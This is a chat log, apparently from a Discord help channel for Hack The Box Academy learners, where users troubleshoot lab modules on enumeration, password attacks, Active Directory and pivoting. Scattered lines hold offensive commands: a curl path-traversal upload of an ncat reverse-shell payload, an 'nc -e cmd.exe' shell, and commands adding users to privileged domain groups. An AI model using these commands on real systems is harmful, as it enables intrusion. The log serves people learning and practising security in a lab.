When you faced these issued did you contact support or anyone in Discord to find a solution for it?

i did not

it just magically worked one day

did you check both key tabs?

Have anyone finished the lfi module and the skill assessment? I'm not sure if my connection is bugged but I can't receive the source code of the php files

Hello

Looking for help in Rasta - Prolab

Is this the right place ?

#prolabs-rastalabs

Where can I find that hashtag?

if you click the hashtag/link it will bring you to the Discord channel for the Rasta lab

It does not open

you need to do the verify in #bot-commands

guys

I found a SIGNING_KEYID, SIGNING_PWD, OSS_USER , OSS_PW and GITHUBKEY in a github repo, how can i exploit now? in a travis.yml file

responsibly report the vulnerability to the project creators; this is not a black hat server (nor is this even the correct channel on the server...)

i mean is it sensitive?

do you think credentials and keys are not sensitive?

yes it is but, they ask for impact. I need impact

if you're looking for someone to write your bug bounty report for you, this is not the place

can anyone help on the last question of the assessment in "Active Directory LDAP"

I'm confused of what its looking for

the place is chatGPT! 😆

shoot me a dm if you still need help

What is the default htb user and PW for neo4j? I'm trying to do the ad bloodhound module.

neo4j:neo4j didn't work and neither does neo4j:bloodhound

i didn't do that module so i can't help with that but if you are on the pwnbox and can't login stop neo4j and run

Ty I'll try that

Unbelievable, this actually works

google that name give me nyan cat so probably yes

one of the images google show of lulzsec is nyan cat

one of the members is nyan cat?

i got a Steganography PNG images encrypted with passphrase
i tried steghide but which doesn't support PNG format.. i try and convert the image to JPG and then used stegcracker.. i still couldn't find the passpharse

if you need to brute force the password try stegseek it can go through rockyou in a few sec

@vital adder , i used stegcracker it went through rockyou for almost 12 hours and didn't find anything

It says the keytab for user svc_workstations

I don't know...I can only see the AES-256 Hash....Is this the way it should work? Can anyone tell me?

yea that tool is slow as hell

stegseek should take a few sec with rockyou (the whole thing) and if you still can't get it then the right password just isn't in rockyou

cool, thanks

@vital adder i tried it.. but while most of the tools doesn't support PNG format

the tool was so fast though, went through rockyou in not less than 30 second

oh shoot i forgot about the png thing and yep that tool is fast

would the hidden information on PNG be tampered after been converted to JPG

not sure but i think so also did you try with tool like exiftool or binwalk with the file?

Hey Crean, could I DM you?

@stuck hull yes

Let me try them out

Maybe there are more encripted files. look around

I havent done yet the module. Have you checked which version is running? In some other module had to update the version because it gave me error.

you can reset the password manually

https://neo4j.com/docs/operations-manual/current/configuration/password-and-user-recovery/#password-recovery-for-admin

The version on my Kali instance didn't work with the provided files so I'm having to use the pwnbox, but I can't seem to scp the zip to it for some reason

you mean send the zip file using scp via ssh? which error does it give you? My problem was more with neo4j (few modules with version 4.2 and had to update to 4.4.x to enter the server and change the default password and connect to it so I could run bloodhound and load the zip file)

Connection refused, no matter what ip I use

It's started, it's listening on 0.0.0.0:22

I added my public key to authorized

damn difficult to help blindly hehe will start the module this weekend. best of luck

Worked yesterday but I couldn't log into neo4j lol

Thanks

guys I am having issues with rdp into windows machines, currently I am studying Active directory attacks & enumeration
When i connect using rdp from my attack box, it disconnect after 3sec or more, any suggestions ?

Module: Firewall and IDS/IPS Evasion - Medium Lab
Prompt: After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
I found the flag, but I cannot figure out how it wants it formatted for the answer

HTB984NIFN97CB0783QBNJCPAS984UIN

That is what I got

Try to wrap the {} around

has anyone had issue with getting back the cubes reward ? I have finished the LDAP module but didn't get 200 cubes back

Is there a way to copy the flag from the vm incase of typos?

Still cannot get it with: HTB{984NIFN97CB0783QBNJCPAS984UIN}
I've tried every format I can think of. This is the service version correct? I found it where it says: Service Info: Host: HTB984NIFN97CB0783QBNJCPAS984UIN; OS: Linux; CPE: ..........

This is not the answer

The best hint is the one it gives you

I do not need to use nc or anything do I? just nmap?

Attacking Common Services Easy - Trying to get my Webshell but i cant get it to work tried uploading different shells but whenever i curl it or open the link in the browser nothing happens and nothing connects back to my listener
tried this command|| curl -k -X PUT -H "Host: 10.129.80.115" --basic -u fiona:987654321 --data-binary "ncat 10.10.15.91 1234 -e" --path-as-is https://10.129.80.115/../../../../../..\xampp\htdocs\myshell.php||

any hints?

sitting almost 5h on this one lol

Also is the version in the form of a flag? or a number like 2.1.8

nmap / it will be in the form of flag

this hint: ||publicly accessible server|| helped me

Got it. with a NSE script. Thanks!

@polar crag use the database to upload the shell

jesus

finaly

got it but im still not sure how haha

Hey, is solving boxes by reading a write up a day before doing so a good enough learning path? I can't seem to solve any on my own but I also don't want to be mindlessly copying and pasting as I read and write

Does anyone have the kira password in Credential Hunting in Linux module? I didn't keep her password from the previous ones.

Unless I'm missing something from the hint

@rustic sage that is not good idea, u need to try first

I had already tried to do so before to no avail

@rustic sage try harder and think out of the box

alright now i could replicate it! finaly free this took me ages lmao and it was only easy

@rustic sage yes i agree with crean... try it first and if you stuck look up for hints, then try harder, repeat.
If you really dont know how to solve them then get the basics down

check out the modules youre weak at

I Know this is the wrong sub but, Im unsure where to go for an annoying email account assiciation issue with my THM account lol

Wrong server entirely

Could you point me in the direction of said server =]

Check your dms

tyvm

Could someone help me with:

• The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system.
• Module: Metasploit - Sessions - last Question
• I am getting a low priv user shell - and I configured the payload to use 'x64' architecture but when I try the other module payload - the CVE one - It says - exploited but no sessions were created, and the current session is also the low priv user.
• I have read the previous chats and I think @hazy grotto faced the same issue - so if you or anyone else have figured it out, Could you please help me, Thanks

@viscid furnace Look for sudo bufferoverflow

1st post here... I'm on Meterpreter module. I have a session as NT Authority\System, i've dumped the hashes and trying to submit the htb-student ntlm hash, it's not taking it as correct. I've converted to all CAPS, submitted as presented, etc... any suggestions?

The Heap overflow right? I have tried but in that only it says no sessions were created

dm me

Be sure to take just the part after the :

dump LSA secrets. youll find what you need there

Just the NT hash, not the lm hash

@ripe badge that's the part i took; however, it's the same for all users

you need the part before the colon

Anyone have a hint for the NoSQL Injection module. I am stuck on the last assessment and can't seem to come up with a payload to return true/false

they arent stored NT:LM theyre stored LM:NT

Yes, the part after, the NT needs to be submitted

so, i tried just running hashdump, but i had to bg the session, and use the post exploit. I've tried entering all parts of the hash, LOL. got this error with hashdump: priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect. so - i'm about to go to google university

Try to migrate to another process. The hash should start with cf.....

you need to steal a system token and migrate to a system process

yeah, that's what i'm doing now, thanks for the help

np

I have a bit of a noob question, I am doing the Windows Fundamentals module and I need to remote to the windows machine with xfreerdp, I enter the information, I press enter. It tells me if I accept the certification, I click Y.
And after that the machine does not spawn

What am I doing wrong ? 😦

Send a screenshot if the error

I'm also having the same problem with host 3, I have a shell but don't have privilege to type the flag. Does anyone have any hints?

send in whisper as I cannot post SS here

thank you!

Verify your account in #bot-commands

Disregard, found the solution to my problem.

Please ,is it preferable to use a virtual box on a windows machine or simply run Kali linux on a USB?

virtual box

hlo

Okay thanks

Does anyone here know how to change windows Mac address

Google is your friend

The best Uncle is Uncle Google,

For the Footprinting module -> DNS section the final question is What is the FQDN of the host where the last octet ends with "x.x.x.203"? I'm assuming i should || use the subdomain list to discover more subdomains via the bash one liner, but its not returning me a domain with the expected IP address. Is this the right path or should i be down another path? ||

You need to find all zones

guys is it weird i prefer pwnin shit on htb instead of hanging out with my fam?

I am doing the following module; https://academy.hackthebox.com/module/147/section/1320, in the hints there is a username + password but I am not able to login with those creds

you’ve learned about mutating passwords and you were provided a username and wordlist try that😉

Thanks, I will ! @rustic sage

I love this Rule; OneRuleToRuleThemAll.rule

Works for far a lot of times haha

I think they provided a rule list to

for your sanity I’d stick to what’s in the resources sections or you’re going to be waiting a lot longer

ahw sure, thanks!

sounds perfectly normal to me lol, family can be stressful, but not in the "omfg I should be able to get into this!!!!" way HtB is

ha nice just what i needed to hear glad to be among my people haha @frigid monolith

I got the NoSQL Injection module anyways

Woah. Checked out the general chat today. Just about got canceled.

I'm so thankful for the people in here.

Hi I'm with a doubt in the module Information Gathering - Web Edition section Active Subdomain Enumeration question: Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. I have managed to perform what I believe were n-number of zone transfers with nslookup (I couldn't with dig, I can't understand how to pass the parameters to make it work). I don't know if i'm understanding correctly the question, is asking how many parts (making a simplification, understanding parts (zones) as containing each the respective registers of FQDN's and ip's ) of this organization can I reach? If any one can give light on this I will really appreciate it

Whats the correct section name?

Active Subdomain Enumeration

Whoops i was looking in OSINT

I maybe have guessed the answer. i can't even remember how this even works.

dig axfr inlanefreight.htb @<IP>

lol i am dying at what the guy who wrote documentation and reporting said: "We've tried to make this typically dull topic more engaging than usual, so strap in. It's going to be a wild ride down the rabbit hole of documentation and reporting!"

Lolll

lol

Damn it sucks being dense

hey anyone done the documenting and reporting final lab. could use some help

Hello I'm working on the sessions section of the introduction to metasploit module. I'm on the last question which indicates sudo is outdated, I have attempted to background the session and use local exploit suggester, and other small tasks but to no avail. Can someone give me a hint?

I have the sudo version, just unsure how I should go about escalating my privilege.

I have found the solution, disregard.

hey if you've done documenting/reporting skill assersment i could use help machine keeps resetting after a min or two making it impossible to complete. have switched vpn's, tried via pwnbox, tried 5 different target ip's nothing works i know what to do but can't do it so if any of yall could help please DM me

ugh the last question on DNS is killing me; not sure what I'm doing wrong per se in regards to getting the answer any help is appreciated; I did the loop command but now I'm not sure where to really go from that... I feel like it should be obvious but I'm just not seeing it

Footprinting DNS

OH MY GOD

I figured... it was

lol i'm so silly on that one

In the final capstone module, does anyone have issues doing ssh dynamic port forwarding on the initial access machine?

For CPTS

Stuck on Password Attacks Medium, I've got the smb creds, j's ssh/sql creds, d's creds including the crack rsa ...but still at a lost when it comes to priv esc to root @.@ and avoided asking for help up until the "Just drop linPeas " feeling washed over me and i valiantly resisted lol #plshlp

I mean... nothing wrong with using tools; they're there to help.. get the answer easy then work backwards on how the automated script got the results

Currently on "Introduction to Networking" and I'm having a hard time grasping the concept of subnetting.. if anybody could chime in and help a homie out, that would be very much appreciated! Mahalo (thank you) \mn/

what exactly is it that is giving you trouble in understanding :)

the assessments for Attacking Common Applications are pretty brutal compared to super easy mode module sections

I found a semi-unintended way to finish the final part though by reading the docs lmao

Good news: my enumeration skill are on par with linpeas...aside from a few CVE's id'd ...Bad News : the Pea didn't give me anymore info

Finding the network and broadcast address in particular. From my understanding the "/27" is the number of bits changed right?

Unchanged.

The first 27 bits remain the same. Only the remaining are variables.

not necessary changed, but enabled; 27 is 27 1's so 11111111.11111111.11111111.11100000; to break into octets we break at every 8 octet represented

https://kb.wisc.edu/ns/page.php?id=3493 here is a little cheat shit for /CIDR notation

the 0 numbers represent the available ips that can be assigned on a network :)

it might be asking you to write out the full command to make the directory

you're on the right track

:)

with linux when you mkdir it drops it as whatever you typed

the only time you may need quotes is if you're using spaces

eh having spaces in a directory just means whenever you reference the full filepath you need to have the quote around the entire path

@.@ i got it

if you're going to separate words for directory/filenaming; i suggest using the '_' or '-'

you'll end up hating yourself so trying to help you break the habit, because you may end up fudging up a command because the filepath referenced, needs quotes, and you forgot a quote, also if you have an open ended quote when finishing out a command it goes to the next line waiting for you to close that quote.

sure shoot me a dm if you still need help with that i'll help you troubleshoot

hey can someone help me with something

i am not able to sign up in htb academy

its is saying u have to verify email

can someone tell me how to solve this

Log into the email account you typed in to Hack the box academy

And it will send you a link, when u click the link ur account will be verified

Appreciate you for this!

Hey @vital adder you still around? I wanna dm you something bc I'm getting an interesting error but not sure what the cause is, but my basic error is "failed to read user names database"

Nvm I figured it out I think

Error resolved

New issue... But eh

i'm here also which module are you having that issue with?

the footprinting smtp module; I got it to stop yelling at me about the wordlist, but now I'm running into the fact that it's not finding any accounts

i probably could have manually enum faster than this lol

but gahd dangit bobby i wanna be cool

... i swear to god

one second

because I SWEAR

if i have been fighting this... for NO reason

yo i lost my phone

can someone help me trace it

Damn bro that's rough

for the smtp thing i just use metasploit the first time because i can't get the tool to work but someone here found out the issue was it was going to fast 🤣

so try with -w 15 at the end

i've been trying to run every iteration of this stupid command LOL

is the ||domain|| important?

i think yes but i didn't have to use it in for the command in my note

@fathom pendant use evolution to login smtp

my initial thing was that it wasn't taking my db so it was using default which drove me nuts LOL

didn't have it installed before but I'll give it a try after this

sorry for the off topic post just want to put this here to linked it to other people asking about oscp

@vital adder I think in the upgraded oscp bufferoverflow was removed

oh wait really?

i just take this screenshot

ok but how? LOL i'm not smart

i got the name

btw

but i'm just like why this hate

for oscp?

it's 2k

i meant the name for the lesson

msfconsole ftw

@fathom pendant u will need username, password and email to login

sounds like a lot of effort

also did you use the given wordlist?

yes

if the smtp-user-enum tool don't work for you try smtp_enum in metasploit

but for the tool 2 main tag is ||-M VRFY|| for the smtp method and ||-w 15|| for the speed

ye metasploit/msfconsole got my back

yep that also got my most of the time other tool don't work

the speed one wasn't necessary though i loaded the actual aux

just had to change directories and stuff

Restarted my computer for the first time since I did the reset let's hope I don't have to do another one LOL

Any pointers on how to find admin email address? (FootPrinting -> IMAP / POP3)

imaps ssl interaction shows ssl cert email address (cto) but that's invalid

tried a few dns enum options on dev subdomain, but no luck

also checked robin's mailbox...no emails there 😦

Hey kinda stuck asking this here due to lacking access to the rest of the server but you're all very helpful so I thought it wouldn't be a big deal

is there any difference between a integer and buffer overflow

after doing some light reading it seems like integer overflows lead to bufferflows and are practically the same thing if you dont get into to much detail

Finally cracked it

I have the following error with Evil-winRM, I tried to google. But I am not able to solve this issue. Has anyone an idea?

I have the same error, when I try to use evil-winrm (installed via gem)

I tried to install older versions of evil-winrm.. but that didn't work

i'm not smart enough to help you with the buffer overflow but for accessing the rest of the channel you'll need to verify first use ++verify at #bot-commands

if you are in the pth section of the password attack module then this should work

just for a sanity check try scanning winrm port on that target machine

Yea.. the winrm port is open. I think there is something wrong with my machine

try restart the target machine wait a few min for everything to fully booted up

In Attacking Enterpise / Active Directory Compromise, the following command to add ttimons to the Server Admins group fails and i don't understand why. Any idea?

PS C:\Users\ilfserveradm\Downloads> $group = Convert-NameToSid "Server Admins"
PS C:\Users\ilfserveradm\Downloads> Add-DomainGroupMember -Identity $group -Members 'ttimmons' -Credential $timcreds -verbose

i get this error "Add-DomainGroupMember : Cannot bind argument to parameter 'Identity' because it is an empty string."

Have you checked the content of the $group variable?

Any idea on how to read .zlib binary compressed file ?

yes ive written it: $group = Convert-NameToSid "Server Admins". This is from the course but doesn't seem to work here

But is there actually anything in the variable?
What happens if you only enter $group?
A SID should be output

Otherwise, I can't see anything that could be wrong.

Hi

quick question

in the Mass IDOR Enumeration
section

im adding the ?uid=1 after /documents.php

but im not seeing any results

is that normal?

can i dm someone about a question in the SMB portion of the Footprinting module? Nevermind got it

It's 😉 verify how the requests are being made

thanks

okay still struggling with the Footprint module -> DNS ||I'm curious why the dnsenum script can't find the ns.internal.inlanefreight.htb name server given its there||

Feels like the answer lies somewhere in
||;; ANSWER SECTION:
dev.inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
dev.inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.||

||and i tried brute forcing that but still never got an entry even with 11mil sub domain wordlist||

Try using the smallest list.

Can someone explain where I'm going wrong in file inclusion module > file prevention question 2. We are supposed to use the php.ini file (there are two) and edit them to block system () commands. But if you cat the path to the php.ini file and use grep system. There is no option for it, so I assume we must enter that whole thing in, but where? And in theory if I try doing a pho webshell that uses system() shouldnt it work, because mine hasn't. Any help would be appreciated +UPDATE+ somehow I big boy brained it and figured it out somehow, I would be glad to help anyone struggling with this in the future.

You can sometimes get away with net group "server admins" theusername /add /domain if you're abusing generic all or something

Did anyone have issues getting a reverseshell using julio's hash? Password Attacks - Pass the hash

I ended up using nc -e cmd.exe instead. The generated powershell code from revshell didn't work.

Looking for some assistance with Credential Hunting in Linux section. I can log in with kira password.. However having trouble locating Will's password. I've poked around and attempted multiple firefox decrypt and utilize LaZagne with no luck.. Can I get a hint in the right direction..

i dm'd you

Hi guys , I wanted to know if you got any material ( youtube or video) of people actually doing EH .

not relevant to the channel

I am doing the following module https://academy.hackthebox.com/module/147/section/1657, I am at the following question; Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio. . I found the right kerberos file, I can interact with DC01. I reverted the instance 2 times but the julio.txt isn't there. Can I dm someone?

Only flag.txt is present (from earlier queston), there is no julio.txt

@rustic sage Trying running the firefox decrypt script from the module.

Was working through the SSH Dynamic Port Forwarding + SOCKS stuff on Pivoting. How does one get rid of these socket error messages when doing an nmap scan over proxychains?

@trail leaf maybe use 0>&1 at the end

nope, didn't work

2>/dev/null did though

Ok

What does the Capital S mean? I know a lowercase means you can execute something with the permissions of another user. or is this an error in the module?

Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)

Password Attacks - Password Reuse

Been working on this for 4 hours and can't seem to figure out what to do.

Hello folks, anyone available to get me some help with the RDP and SOCKS Tunneling with SocksOverRDP module -- I did exactly what was instructed but kept getting an error when connecting over RDP with the user jason. is there a workaround on this or a hint to finish the module would be awesome! Thank you.

@placid quest I now see what you meant by using evolution: Thanks for the hint; it was self explanatory once it clicked :D

Hello. Can I get any help with this? My targets are always or almost always dead, and I don't know why.
#1056334951735365752 message

I appreciate the nudge..

Hey I apologize if this is the wrong section for this. I’m new to discord and new to cybersecurity/ pen testing; I’ve been doing a few paths/ modules and had a silly question; is the “bash” terminal called “mate” in the workstation? I was stumped on the introduction for a stupid long time; restarted and had to subscribe to start a new instance but I planned to anyway

sometimes you have to be slightly more specific, and sometimes capitalization matters :)

bash is a shell, mate is just a particular terminal emulator thay can run various tools, bash and other shells being amongst the more common stuff.

@hazy grotto Check the github repo for default passwords, the link is in the module.

anyone here done skill assess for sql injection fundamentals? pretty far but could use some help

Am I doing this wrong? In password attacks, I'm looking for the julio.txt flag and it's empty?
. D 0 Thu Jul 14 12:25:24 2022
.. D 0 Thu Jul 14 12:25:24 2022
julio.txt A 0 Sun Dec 25 00:50:40 2022

you've cat and looked at it yeah?

usually the answer is within the module as well

@fathom pendant smbclient //dc01/julio -k -c "more julio.txt"

That's what I ran to read it.

not on that one yet - are you able to actually access the server share to take a look?

@fathom pendant
smb: \SharedFolder> cd julio
smb: \SharedFolder\julio> ls
. D 0 Thu Jul 14 12:25:24 2022
.. D 0 Thu Jul 14 12:25:24 2022
julio.txt A 0 Sun Dec 25 01:03:44 2022

            7706623 blocks of size 4096. 4459931 blocks available

if only there was a way to retrieve a file this way ¯_(ツ)_/¯

Is the same section. Maybe I’m blind I’m not seeing it I’ll keep looking though

@hazy grotto https://github.com/ihebski/DefaultCreds-cheat-sheet

Ah never mind I found it

Thanks

@fathom pendant must be an error in lab. I can read linux01's flag but not julio's on the same share.

¯_(ツ)_/¯

@dim hound I think it's an error in the lab

Ticket cache: FILE:/tmp/krb5cc_647401106_XXXXXX
Default principal: julio@INLANEFREIGHT.HTB

Valid starting       Expires              Service principal
12/25/2022 01:10:02  12/25/2022 11:10:02  krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
        renew until 12/26/2022 01:10:02
12/25/2022 01:10:59  12/25/2022 11:10:02  cifs/dc01@INLANEFREIGHT.HTB
root@linux01:/tmp# smbclient //dc01/julio -k
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 14 12:25:24 2022
  ..                                  D        0  Thu Jul 14 12:25:24 2022
  julio.txt                           A        0  Sun Dec 25 01:03:44 2022

                7706623 blocks of size 4096. 4459477 blocks available

Anyone ever get this error with hydra before? Im at a loss for how to fix it

@graceful rampart try ftp

ftp aint running on this machine lol

I'm pretty sure it is, did you nmap scan. I used ftp instead of ssh.

I was running into the same errors. It timesout too much

i didnt cuz the question said use ssh. Lemme look

Network Enumeration with Nmap - Service enumeration module - Nmap service scan runs fine on all ports but am not seeing anything that looks like a flag.

@eternal vale what flags did you use?

nmap -sV -p- 10.129.2.49 -T5